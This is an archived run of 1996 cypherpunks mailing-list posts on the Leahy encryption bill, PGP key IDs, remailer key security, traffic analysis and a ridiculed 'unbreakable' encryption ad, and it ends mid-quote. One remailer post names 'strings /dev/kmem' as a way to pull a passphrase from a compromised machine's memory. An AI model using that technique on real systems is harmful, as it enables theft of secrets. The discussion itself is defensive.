Why not demonstrate you're right first Mr. Bell?  Tell us all how the 
latest decision will impact Leahy bill in terms a bit more specific than 
"The supreme court is stupid, so you're going to get screwed."  Cite 
provisions.  Show us why the dicta you use is important rather than 
fluff.  What was the holding in the seizure case?  Do you even know?

It's easy for me to say "The latest Supreme Court Decision is going to 
make currency ILLEGAL!  LOOK OUT!  HIDE YOUR DOUGH!"  However, this does 
not mean I can expect every legal expert on the list to spend hours going 
over the opinion, and refuting endlessly the raving antics of my lunacy.  
The burden is on the presentor to make the connection.  You're logic 
seems to look mostly like this.

There was a court decision.
Mr. Will is a popular newspaper writer.
therefore Mr. Will is qualified to intrepret the decision.
Mr. Will says some disparaging things about the decision.
threfore The Decision is BAD.
The decision has to do with seizure of jointly owned property.
Remailer messages are jointly owned property.
therefore the decision must apply to remailers.
Since the property in the decision was seized,
and since the Leahy bill has something to say about encryption,
and since the seizure decision means that the supreme court has their 
head up their ass,
therefore remailer messages and remailers WILL BE SEIZED.

If there is a more logical chain here, I'd love to hear it.

> you can.  Convince us that you're not just an elitist snob

I am an elitist snob.  Who want's a passive attorney fighting for them?  
I worked hard for my degrees, my post-graduate work, and the Bar.  I think I 
have earned a bit of ego for my years of hell.  If nothing else, I have 
taken 23 hours more of aba accredited legislation courses from a top 10 
U.S. law school than you have.

> Jim Bell
> 
> jimbell@pacifier.com

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Wed, 13 Mar 1996 07:28:24 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: [noise] Re: Do you feel lucky, punk?
In-Reply-To: <Pine.SUN.3.91.960311213348.11349A-100000@polaris.mindport.net>
Message-ID: <Pine.BSF.3.91.960312030008.4165F-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 11 Mar 1996, Black Unicorn wrote:

> On Mon, 11 Mar 1996, jim bell wrote:
> 
> > At 05:54 PM 3/11/96 -0500, Black Unicorn wrote:
> 
> 3> At least, that is the position the prosecutors could surely take, 
> especially given this Supreme Court decision.
> 
> Uh huh.  They might also take the position that the defendent is ugly, 
> and should be convicted.  That doesn't make it a legally viable argument.

No, we usually go for the more general "I don't like the defendant." 


EBD
Assassination Politics target #xxxx.


BTW if I ever start lecturing cryptgraphers incessantly over days with 
rantings about the technical aspects of cryptography, I hope one of you 
tells me to shut the fuck up.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 13 Mar 1996 07:29:32 +0800
To: jamesd@echeque.com
Subject: Re: A lengthy preliminary analysis of the Leahy bill.
In-Reply-To: <199603120546.VAA10498@dns2.noc.best.net>
Message-ID: <Pine.SUN.3.91.960312031223.11349I-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 11 Mar 1996 jamesd@echeque.com wrote:

> At 12:26 PM 3/11/96 -0500, Peter D. Junger wrote:
> >     (4) the authority and ability of investigative and law enforcement
> >     officers to access and decipher, in a timely manner and as provided
> >     by law, wire and electronic communications necessary to provide for
> >     public safety and national security should also be preserved;
> 
> 
> This provision of the bill makes the entire bill a worthless 
> pile of repressive shit, despite all the pious good intentions
> in the rest of the bill.

Careful here.  Note exactly what the bill says:

wire and electronic communications necessary to provide for
public safety and national security should also be preserved;

SHOULD ALSO be preserved.

Typically this means that it's not going to be funded by this bill, and 
that this is just a bit of extra hint as to legislative intent.

I will grant you that it's not a nice bit, but it could easily have said 
"WILL be preserved."

Note this clause also does not assign the authority to any agency, or 
suggest how it might be accomplished.  It's a good indicator of where 
things are going, but in itself, it implements nothing.

(Disclaimer: I haven't read the entire bill yet).

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@kampai.euronet.nl>
Date: Wed, 13 Mar 1996 03:42:59 +0800
To: cypherpunks@toad.com
Subject: Re: PGP reveals the key ID of the recipient of encrypted msg
Message-ID: <199603121020.FAA20726@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

markm@voicenet.com wrote:
On Mon, 11 Mar 1996 savron@world-net.sct.fr wrote:

> > I began testing PGP  a few days ago ( I'm a PGP newbie ) and I found
> > that it gives out the key ID of an encrypted message . From this you
> > can get the  identification of the recipient of the message , if it's
> > someone who has publicaly  distributed his  key (keyserver , homepage
> > ...) . So even if you are unable to decode the message you  can find
> > who is the recipient of a given message . I think this is a big
> > privacy problem .
> 
> The recipient of the message is right in the "To:" header of the message.
> If you anonymously remail a message, however, only the last remailer in the
> chain will know to whom the message is encrypted, but the last remailer can
> also just read the "To:" header.  I don't find this to be a problem at all.

Not everything goes via email, eg. mail exchanges via alt.anonymous.

Gary
- --
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@kampai.euronet.nl>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06 

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMUVP2CoZzwIn1bdtAQGlBwF8DxnCbaU1P0pz0TQ7OkuE9kkuSgnf6Ump
3p6Ut328gqJGj7oEza5S78rjBMpHgUej
=2Ymx
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Date: Wed, 13 Mar 1996 03:41:05 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: How would Leahy bill affect crypto over HAM radio?
Message-ID: <199603121028.FAA08674@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


jim bell wrote:

> Even so, it isn't clear that this new law WON'T change the rules under which 
> hams operate.  An affirmative statement of the right to use encryption would 
> seem to pre-empt prior bans, except if there was some sort of explicit 
> exception for over-the-air transmissions.  After all, the law was written 

I re-read the bill... it notes "wire" communications, as opposed to 
all forms.  It also allows for previous restrictions to keep in 
effect, I think.

Still, the distinction between wire and wireless is not clear anymore 
with new technologies.  Certainly if enough HAMs pester Sen. Leahy 
about this 'oversight' positive changes could be made.

[..]
> Not that such an interpretation will necessarily be welcomed by some hams:  
> Part of the reason for maintaining the ban on encryption would be the fear by 
> hams that ham bandwidth will be surreptiously used by commercial services 
> masquerading as ham users.  Encryption would make such usage difficult to 
> detect.

Interesting point... 


 
Rob. 

---
Send a blank message with the subject "send pgp-key" (not in
quotes) to <WlkngOwl@unix.asb.com> for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@kampai.euronet.nl>
Date: Tue, 12 Mar 1996 20:55:31 +0800
To: cypherpunks@toad.com
Subject: Remailer passphrases
Message-ID: <199603121043.FAA20786@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

markm@voicenet.com writes:
On Mon, 11 Mar 1996, Gary Howland wrote:

> > This of course assumes that the remailer runs as a process - if it doesn't
> > then there is no reason a 'remailer helper' cannot.
> >
> > The only disadvantage of this is that the remailer cannot be rebooted
> > without a passphrase being entered, but then there are ways around this
> > (entering the passphrase remotely over a secure link etc., or more
> > sophisticated 'remote authorisation' systems).
> >
> > The advantage of this is that the password is never on the disk,
> > only in memory (which will take serious (read "expensive") to extract).
> 
> I don't know that it would be that expensive.  If someone was able to gain
                                                 ^^
> root access to the system, something like "strings /dev/kmem" could narrow
> the search for the passphrase down significantly.  Of course one could
> obfuscate the passphrase by XOR'ing it with 0x80, but that's only security
> through obscrurity.

Sure, _if_ they were able to gain root access without rebooting the machine,
but the usual scenario is that the filth turn up with black bin liners, not
men from the NSA.

Gary
- --
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@kampai.euronet.nl>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06 

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMUVVMioZzwIn1bdtAQFFPAGAkqQFY1FRwSunSdqkvZBQx8S6BnD7UXRV
ztKYpHcCkyex8pT4jL/WqeEIGPUXfi4l
=voJ5
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@kampai.euronet.nl>
Date: Tue, 12 Mar 1996 21:39:54 +0800
To: cypherpunks@toad.com
Subject: Re: FCC & Internet phones
Message-ID: <199603121049.FAA20806@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Adam Shostack wrote:
> Loren James Rittle wrote:
> | >Most
> | >presumably use a mix of a UDP data connection and tcp for control
> | >functions.
> |
> | OK, everything after the IP header is encrypted.  I don't even know
> | which protocol is in use.
> 
>         Are you willing to play Mallet?  Drop IP packets, and look for
> duplicates.  Those are TCP.  (IPSEC might handle this, but I bet there
> will be broken implementations that save time by resending.)

Are you saying UDP protocols don't retransmit un-acked packets?
If not, then you can't be sure the duplicates are TCP.


Gary
- --
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@kampai.euronet.nl>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06 

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMUVWwioZzwIn1bdtAQHQaAGA1EjYZpEKrie9t/eIohlrHCC4rUY8Dzu1
HgB+1ZbAS8X7hIRb3eSHLlBB13LZtkDH
=4Tgg
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mutant Rob <wlkngowl@unix.asb.com>
Date: Tue, 12 Mar 1996 22:29:36 +0800
To: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Subject: Re: Mile High Snakeoil
In-Reply-To: <9603111947.AA00418@ch1d157nwk>
Message-ID: <3145574F.38A9@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


I've been thinking about this a while. Perhaps it's high time some of us
try to contact Consumer Reports or some of the local TV/Newspaper consumer
reporters and encourage then to do features on encryption software... might
even get them to talk about ITAR, GAK, and the Leahy Bill...


Andrew Loewenstern wrote:
> I was flipping through a copy of Spirit, the official magazine of Southwest
> Airlines, while on a flight to Vegas and found a thoroughly enjoyable
> advertisement for a crypto product.  Underlines and emphasis are theirs.[..]
>  Encryption through totally unbreakable Stonewall-Drawbridge is your
> ultimate security blanket.[..]
> DRAWBRIDGE applies mathematical algorithms to encrypt messages and uses a
> quasi-infinite, one-way transfer to ensure veracity.  Drawbridge uses an
> Infinite Venegere Key (IVK), combined with a one-way private key transfer  ^^^^^^^^^^^^^^^^^^^^^^
> which is impossible to break, except by chance, once in a million years.

Hahahaha. *cough*




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@kampai.euronet.nl>
Date: Wed, 13 Mar 1996 13:29:33 +0800
To: cypherpunks@toad.com
Subject: [noise] Re: Do you feel lucky, punk?
Message-ID: <199603121103.GAA20839@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Black Unicorn write:
> On Mon, 11 Mar 1996, jim bell wrote:
> > Remember, one of the basic assumptions that any supporter of the Leahy bill
> > could be making is that it will be interpreted INTELLIGENTLY by courts.

> Wrong.  The assumption is that the rules of statuatory construction and a
> long history of weighing legislative history will be used in intrepreting
> the statute.

Surely one of the basic assumptions of the supporter of any bill is that it
_will_ be interpreted intelligently?  [Note - Jim is not saying this is the
_only_ assumption].


It's hard to make bills foolproof, since fools are so ingenious ...

Gary
- --
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@kampai.euronet.nl>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06 

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMUVZ8ioZzwIn1bdtAQGj7QGAjQfpDDRD0LSqjEe0NqECd7mTe4coqPm6
mvRoQzFqmZxggtMjldvVj3R8T4cfir2A
=YtOX
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shabbir@vtw.org (Shabbir J. Safdar)
Date: Wed, 13 Mar 1996 03:41:47 +0800
To: thad@hammerhead.com (Thaddeus J. Beier)
Subject: Re: TWP on Crypto Keys
Message-ID: <199603121158.GAA19202@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



I think the upshot of it is that they just read the bill (and the
surrounding issues) incorrectly.  I read the editorial and said to myself,
"they aren't reading the same bill the rest of us are reading".

-Shabbir J. Safdar * Online Representative * Voters Telecomm. Watch (VTW)
 http://www.vtw.org/ * Defending Your Rights In Cyberspace

Thaddeus J. Beier writes:
>Somebody posted this editorial this morning, that includes the
>following passage:
>
>>    The Washington Post, March 11, 1996, p. A18.
>> 
>>    Security and Software [Editorial]
>...
>> 
>>    Legislation introduced this month in both the House and the
>>    Senate would ease the export restrictions while attempting
>>    to meet some of the government's security concerns. Code
>>    makers would deposit a "spare key" to any exported
>>    encryption software with a trusted third-party agency...
>
>Now, I thought that the bills did no such thing.  How could The
>Washington Post get this so wrong?
>
>As I understand it, the bills do not in any way tie export to
>key escrow.  They mention key escrow only to the extent that
>they specify that it is illegal to disclose the keys.
>
>Why would the paper get this cockeyed?  Is it just a screwup,
>or are they pushing for a change?
>
>thad
>-- Thaddeus Beier                     thad@hammerhead.com
>   Technology Development                   408) 286-3376
>   Hammerhead Productions        http://www.got.net/~thad 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Carl M. Kadie" <kadie@eff.org>
Date: Wed, 13 Mar 1996 02:42:29 +0800
To: eagle@armory.com
Subject: Electronic Frontiers Wyoming (fwd)
In-Reply-To: <9603120216.aa04516@deepthought.armory.com>
Message-ID: <199603121633.IAA25987@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


There are strong laws on the boks protecting student privacy.

[From _College and University Student Records: A Legal Compendium_,
Edited by Joan E. Van Tol, 1989]

================== p. 119 ===============

The [Family Educational Rights and Privacy Act] regulations ... were
significantly modified in 1988. ... The new regulations amend the
definition of directory information and establish a standard for the
designation of directory information.  The new definition is:

' ... information contained in an education record of a student which
would not be considered harmful or an invasion of privacy if
disclosed.  It includes, but is not limited to, the student's name,
address, telephone list, date and place of birth, major field of
study, participation in officially-recognized activities and sports,
weight and height of members of athletic teams, date of attendance,
degrees and awards received, and the most recent previous educational
agency or institution attended.'

The new standard -- that which would not be considered harmful or an
invasion of privacy if disclosed -- permits the educational
institution to exercise its discretion in the designation and and
release of directory information provided that the eligible student
does not object to the disclosure.

======================== p. 106 ============
[From the regulations: 34 C.F.R., 99.37 (1988)]

99.37 What conditions apply to disclosing directory information?

(a) An educational agency or institution may disclose directory information
if it has given public notice to parents of students in attendance and
eligible student is attendance at the agency or institutional of --

(1) The types of personally identifiable information that the
agency or institution has designed as directory information;

(2) A parent's or eligible student's right to refuse to let the agency
or institution any or all of those types of information about the
student as directory information; and

(3) The period of time within which a parent or eligible student has
to notify the agency or institution in writing that he or she does
not want any or all of those types of information about the student
designed as directory information.

================== p. 155 ================ 
[from a reprint of an article printed in 1982 in _Computer/Law
Journal_ by a Ms. Hyman.]

 ... A waiver of FERPA rights made pursuant to section 99.7 must be
exercised by the student {109} and can apply to all FERPA rights
{110}.  Wavers must be signed {111}, and are most commonly given
regarding letters of recommendation for admission {112}. Institutions
may request students to waive their right of access to these letters,
but they may not require a waiver as a condition for admission or
services.{113}.

[References]
{110} 34 C.F.R. 99.7(a) (1980)
{113} 34 C.F.R, 99.7(b) (1980) [Which I think cooresponds to this section of the 1988
regulations - cmk]

====================== p. 104 =================
[34 C.F.R. 99.12 (1988)]

99.12 What limitations exist on the right to inspect and review
records?  ...

(b) A postsecondary institution does not have to permit a student to
inspect and review educational records that are -- ...

(3) Confidential letters and confidential statement of recommendation
places in the student's records ..., if

(i) The student has waived his or her right to inspect and review
those letters and statements;
...

(c) A waiver under paragraph (b)(3)(i) of this section is valid only
if --

(i) The educational agency or institution does not require the waiver
as a condition for admission to or receipt of a service or benefit
form the agency or institution;

...
============================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Wed, 13 Mar 1996 04:13:53 +0800
To: gary@kampai.euronet.nl (Gary Howland)
Subject: Re: FCC & Internet phones
In-Reply-To: <199603121049.FAA20806@bb.hks.net>
Message-ID: <199603121432.JAA06480@homeport.org>
MIME-Version: 1.0
Content-Type: text


Gary Howland wrote:

| Adam Shostack wrote:
| > Loren James Rittle wrote:
| > | >Most
| > | >presumably use a mix of a UDP data connection and tcp for control
| > | >functions.
| > |
| > | OK, everything after the IP header is encrypted.  I don't even know
| > | which protocol is in use.
| >
| >         Are you willing to play Mallet?  Drop IP packets, and look for
| > duplicates.  Those are TCP.  (IPSEC might handle this, but I bet there
| > will be broken implementations that save time by resending.)
| 
| Are you saying UDP protocols don't retransmit un-acked packets?
| If not, then you can't be sure the duplicates are TCP.

Err, yes.  Thats the point of UDP; its unreliable and has no
acknowweldgement.

"The User Datagram Protocol uses the underlying Internet Protocol to
transport a message from one machine to another, and provides the same
unreliable, connectionless datagram delivery semantics as IP."
(Comer, 11.3)

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arley Carter <ac@hawk.twinds.com>
Date: Wed, 13 Mar 1996 03:00:02 +0800
To: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Subject: Re: Mile High Snakeoil
In-Reply-To: <9603111947.AA00418@ch1d157nwk>
Message-ID: <Pine.HPP.3.91.960312093522.2934A-100000@hawk.twinds.com>
MIME-Version: 1.0
Content-Type: text/plain


Oh No........... Not again Mr. Bill.  Still recovering from the IPG exploit.
Troll shield now in place Captain. ;-)

Regards:
-arc

Arley Carter
Tradewinds Technologies, Inc.
email: ac@hawk.twinds.com
www: http://www.twinds.com

"Trust me. This is a secure product. I'm from <insert your favorite 
corporation or government agency>."

On Mon, 11 Mar 1996, Andrew Loewenstern wrote:

> I was flipping through a copy of Spirit, the official magazine of Southwest  
> Airlines, while on a flight to Vegas and found a thoroughly enjoyable  
> advertisement for a crypto product.  Underlines and emphasis are theirs.
> 
> ----  Begin Snake-Oil Advertisement  ----
> 
> __UNBREAKABLE__ COMPUTER SECURITY AND PRIVACY AT A __BREAKTHROUGH__ LOW PRICE!
> 
> Stonewall-Drawbridge - Encryption Sytem
> 
> In the face of the increasingly dangerous invasion of professional, business  
> and personal privacy, unbreakable computer security at an affordable cost is  
> a must.  Lawyers, Accountants, Doctors, other professionals whose stock in  
> trade is confidential information are especially vulnerable to malpractice as  
> a result of unprotected information.  It is important to deal with this very  
> real potetial problem before it becomes a problem.  Every business, every  
> individual must also be concerned about computer security.  Encryption can  
> now be used to secure everything from credit card numbers to legal documents.  
>  Encryption through totally unbreakable Stonewall-Drawbridge is your  
> ultimate security blanket.
> 
> *Available Only to United States Citizens*
> 
> STONEWALL an unbreakable, streaming type algorithm, 100 to 10,000 times  
> faster than other encryptions.  Stonewall compresses prior to encryption,  
> eliminating the possible invasion of your computer files.  Its key cannot be  
> broken except by random chance, once in a million years.  Good for DOS;  
> Windows 3-1;  Windows 95 operating systems.....   ......$195
> 
> DRAWBRIDGE applies mathematical algorithms to encrypt messages and uses a  
> quasi-infinite, one-way transfer to ensure veracity.  Drawbridge uses an  
> Infinite Venegere Key (IVK), combined with a one-way private key transfer  
> which is impossible to break, except by chance, once in a million years.  It  
> also incorporates a forge-proof digital signature for verification and  
> authentication insuring absolute transmittal protection.
> 
> STONEWALL-DRAWBRIDGE ENCRYPTION SYSTEM provides unbreakable security  
> protection for your "need to protect" files, archives and computer to  
> computer transmission.  The Stonewall-Drawbridge System is the ultimate  
> encryption system, unmatched by anything else available...at a price that is  
> significantly lower than any competitive product.  This means it is  
> affordable for every professional, business or individual who needs and seeks  
> total and unfailing computer security....especially on the  
> Internet.......$295
> (includes a second system for your choice of contact)
> 
> (800) 610-0859  Mr. Thomas
> <order form deleted>
> (30 Day Money Back Guarantee)
> 
> Make Checks Payable to: HWI
> 747 E. Green Street, Suite 300, Pasadena , CA 91101-2119
> 
> ----  End Snake-Oil Advertisement  ----
> 
> 
> andrew
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 13 Mar 1996 00:25:22 +0800
To: cypherpunks@toad.com
Subject: DOT_con
Message-ID: <199603121503.KAA28612@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   3-12-96. TWP:

   "Making Connections With Dots To Decipher U.S. Spy
   Spending. Panel's Report Indirectly Discloses Details It
   Urged Keeping Secret."

      Buried in the commission's report is a chart that
      provides a striking account of previously secret spy
      spending and personnel levels for the CIA, NSA, DIA and
      NRO. The chart also confirms that the NSA, together with
      its various military service components employs the most
      people, a total of nearly 40,000 eavesdroppers and
      codebreakers. It appears to have an annual budget of
      around $3.7 billion.

   DOT_con






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 13 Mar 1996 06:20:29 +0800
To: cypherpunks@toad.com
Subject: Re: Leahy bill nightmare scenario?
Message-ID: <m0twYl5-00090jC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:09 PM 3/11/96 -0800, Timothy C. May wrote:
>At 11:29 PM 3/11/96, jim bell wrote:
>
>>Welcome to prison, Tim.  Your optimism will serve you well, there.
>>
>>BTW, it is clear that you haven't yet read Mr. Junger's analysis of the
>>bill.  Nobody except a government stooge could read that and not wonder why
>>anybody would support that bill.  A complete re-write is called for.
>
>A question, Jim: do you _ever_ just respond calmly to a post you disagree
>with, or is everyone you disaagree a stooge, a cretin, an agent for the
>Feds, or someone who should be disposed of with your "assassination
>politics"?

What's your definition of "calmly."  I'm as "calm" as you can imagine. I 
simply have not a shred of mercy in me for people who can't accept reality.

>Yes, I read Junger's analysis. A nice analysis. What does this have to do
>with the points I was making? I'm a government stooge, to use your terms,
>because of my points about hotel rooms?

Fortunately for me, Tim, and unfortunately for you, a friend of mine visited 
me last night, an ex-cop who is now a cabbie (he left the force due to an 
accident, slipping on glare ice chasing a "perp", which caused an inoperable 
back injury).  Being a cabbie (in the same town he was a cop), and very 
familiar with the "drug" and "prostitute" sections of town, I asked him 
whether or not he was aware of a hotel or motel ever being siezed by the 
govt. for "tolerating" drugs and/or prostitution.

His reply was that as we speak, he knows exactly where a motel has been 
closed, locked up, and BARRICADED with _city_ signs and POLICE TAPE (you 
know the kind, "Police line:  Do not cross.").  We're not talking of a 
bankrupty, or a voluntary shutdown, either.  His understanding was that this 
was on the news a while back.  Would you like the name and address?  I 
didn't ask him for it, but I'm sure he'll be driving by it again 
within the next week or so.

I accept your anticipated apology, Tim.

Jim Bell
jimbell@pacifier.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 13 Mar 1996 01:33:18 +0800
To: cypherpunks@toad.com
Subject: Panorama of the Spy Industry
Message-ID: <199603121537.KAA02468@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   http://www.fas.org/pub/gen/fas/irp/overhead/index.html

   _________________________________________________________
   
   FAS Project on Intelligence Reform 
   _________________________________________________________

                OVERHEAD THE INTELLIGENCE COMMUNITY

   As part of our Intelligence Agency model homepage profiles
   of the components of the intelligence community, we are
   constructing a picture gallery of agency and contractor
   sites and buildings. These are derived from US Geological
   Survey and other aerial photographs. We obtained some of
   these initial test images from Los Alamos National Lab.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 13 Mar 1996 04:58:48 +0800
To: cypherpunks@toad.com
Subject: Re: Remailer passphrases
Message-ID: <199603121853.KAA28808@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  5:43 AM 3/12/96 -0500, Gary Howland wrote:
>On Mon, 11 Mar 1996, Gary Howland wrote:
>> root access to the system, something like "strings /dev/kmem" could narrow
>> the search for the passphrase down significantly.  Of course one could
>> obfuscate the passphrase by XOR'ing it with 0x80, but that's only security
>> through obscrurity.
>
>Sure, _if_ they were able to gain root access without rebooting the machine,
>but the usual scenario is that the filth turn up with black bin liners, not
>men from the NSA.

The bottom line of all cryptography is that there is something that must be
kept secret.  Since it must be kept secret, there is always a significant
level of paranoia about the means to keep the secret.  For example, one
could imagine an attacker attaching a logic analyzer to the CPU chip,
unloading the on-chip caches and then rummaging thru the system memory for
the secret.

One of the reasons classical (government) crypto users change keys
frequently is to minimize the amount of data compromised by a broken key. 
We keep hearing about NSA decrypting 20 year old cyphertext and showing
more of the workings of the atomic spy rings operating in the 40s and 50s. 
If an opponent can rubber hose the key, her job is easy.  If she has to
perform cryptoanalysis, it is much harder.  Remailers should regularly
change their keys to avoid compromising previously recorded traffic.  (They
can have a long lived key for signing their traffic keys.)

Regards - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 13 Mar 1996 07:52:49 +0800
To: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Subject: Re: How would Leahy bill affect crypto over HAM radio?
Message-ID: <m0twZyV-0008zbC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:21 AM 3/12/96 +0000, Deranged Mutant wrote:
>jim bell wrote:
>
>> Even so, it isn't clear that this new law WON'T change the rules under which 
>> hams operate.  An affirmative statement of the right to use encryption would 
>> seem to pre-empt prior bans, except if there was some sort of explicit 
>> exception for over-the-air transmissions.  After all, the law was written 
>
>I re-read the bill... it notes "wire" communications, as opposed to 
>all forms.  It also allows for previous restrictions to keep in 
>effect, I think.

Perhaps.  But I would hope that this bill would also contain protections for 
good-old-paper storage and communication (as admittedly useless as it may 
appear) and infrared and radio communication (such as satellite feeds, 
including uplinks, point-to-point microwave, IR links, PDA (personal digital 
assistant) links, cell phone connections, cordless phone connections, fiber 
LANs ("wire" and "fiber" might arguably be legally identical, but I wouldn't 
count on it) and various forms of electronic and magnetic and optical storage.

>Still, the distinction between wire and wireless is not clear anymore 
>with new technologies.  Certainly if enough HAMs pester Sen. Leahy 
>about this 'oversight' positive changes could be made.

I think it's going to take a LOT of pestering.  I didn't see a single 
concern of Mr. Junger that sounded inappropriate, and there are a lot of 
protections that could be added to this bill if people like him had the 
opportunity.  A substantial load of stuff needs to be REMOVED, as well!  All 
that key-escrow crap, at least with regard to the escrow holder.  If key 
escrow is VOLUNTARY, then the key user and key holder can come to whatever 
VOLUNTARY agreement they'd care to.  The only "key escrow" material that 
needs to be put into law are unavoidable criminal penalties for GOVERNMENT 
AGENTS who induce people to violate their contracted obligations, and 
requirements that any key-user be informed immediately if his key escrow 
agent is approached on any matter related to his escrow agreement, 
especially if this approach is done by a government agent.

>[..]
>> Not that such an interpretation will necessarily be welcomed by some hams:  
>> Part of the reason for maintaining the ban on encryption would be the fear by 
>> hams that ham bandwidth will be surreptiously used by commercial services 
>> masquerading as ham users.  Encryption would make such usage difficult to 
>> detect.
>
>Interesting point... 

Hams have been allocated a lot of (now!) very valuable spectrum space.  The 
orginal arguments for that were probably:

1.  It's there and we're not using it.  (not so true anymore!)

2.  Hams drive technology (although admittedly that it's really so true 
anymore, either.)

3.  Hams provide valuable community services, for example in case of 
emergencies.  (still true)

But what law giveth, law can also taketh away.  A few years ago, a 2-MHz 
portion of the 220-225 MHz ham ban (220-222 MHz) was taken away and given to 
UPS, yes, UNITED PARCEL SERVICE.  Ostensibly, the reason was that hams 
weren't using it adequately, a claim which might or might not have been true.

Hams "police" themselves and their spectrum space fairly well, because abuse 
(or merely lack of use!) may lead to the loss of the space.

Jim Bell, N7IJS
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 13 Mar 1996 22:48:07 +0800
To: Gary Howland <cypherpunks@toad.com
Subject: Re: [noise] Re: Do you feel lucky, punk?
Message-ID: <m0twZyX-0008zdC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:03 AM 3/12/96 -0500, Gary Howland wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>Black Unicorn write:
>> On Mon, 11 Mar 1996, jim bell wrote:
>> > Remember, one of the basic assumptions that any supporter of the Leahy bill
